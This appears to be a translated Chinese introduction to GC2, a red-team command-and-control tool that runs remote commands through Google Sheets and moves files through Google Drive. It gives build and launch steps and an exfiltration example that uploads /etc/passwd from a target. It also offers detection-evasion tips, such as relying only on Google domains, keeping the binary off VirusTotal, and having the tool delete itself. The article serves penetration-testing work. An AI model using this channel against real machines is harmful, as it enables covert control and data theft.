GC2是什麼工具

GC2是一款功能強大的命令控制應用工具，該工具將允許廣大安全研究人員或滲透測試人員使用Google Sheet來在目標裝置上執行遠端控制命令，並使用Google Drive來提取目標裝置中的敏感資料。

值得一提的是，該工具可以直接提供命令控制服務，而無需進行其他額外的安裝和配置，因此可以大大提高紅隊滲透活動的效率。除此之外，這款工具只能跟Google的域名（*. http:// google.com ）互動，因此也增加了檢測GC2的難度。

請注意：千萬不要將已編譯好的程式碼上傳到VirusTotal上！

功能介紹

使用Google Sheet作為終端視窗來實現命令控制與命令執行。

使用Google Drive向目標主機傳輸和下載檔案。

使用Google Drive從目標主機中提取資料。

退出執行。

工具執行流程

工具安裝&配置

第一步：使用下列命令將該專案原始碼克隆至本地，然後構建專案程式碼：

git clone 
cd GC2-sheet
go build gc2-sheet.go

第二步：建立一個新的Google “服務賬號”，此時我們需要點選 https:// console.cloud.google.com / 來建立該服務賬號所需的.json金鑰檔案。

第三步：啟用Google Sheet API和Google Drive API。

第四步：配置Google Sheet和Google Drive。建立一個新的Google Sheet，並新增服務賬號至spreadsheet的Editor組：

建立一個新的Google Drive資料夾，並將服務賬號新增進這個資料夾的Editor組中：

第五步：使用下列命令啟動GC2：

gc2-sheet --key <GCP service account credential file .JSON > --sheet <Google sheet ID> --drive <Google drive ID>

注意事項：你可以將引數以硬編碼的形式寫入進程式碼中，並只將可執行程式上傳至目標裝置上。

工具使用

命令執行

GC2每五秒會向spreadsheet傳送一次請求，並檢查是否存在未執行的新命令。命令必須插入值請求中的“A”欄位記錄中，而命令輸出結果將儲存在“B”欄位中。

資料提取

我們可以使用指定的命令來在目標裝置上執行檔案上傳或下載任務：

From Target to Google Drive
 upload;<remote path>
 Example:
 upload;/etc/passwd

下載檔案

我們可以使用指定的命令來在目標裝置上執行檔案上傳或下載任務：

From Google Drive to Target
 download;<google drive file id>;<remote path>
Example:
 download;<file ID>;/home/user/downloaded.txt

退出執行

透過傳送“exit”命令，GC2將會從目標裝置上遠端刪除自身程式碼，並終止自身程式的執行。注意，如果開啟程式時使用了符號連結，那麼命令執行結果可能會是符號連結或路徑所指向的目標，從而導致刪除錯誤的目標。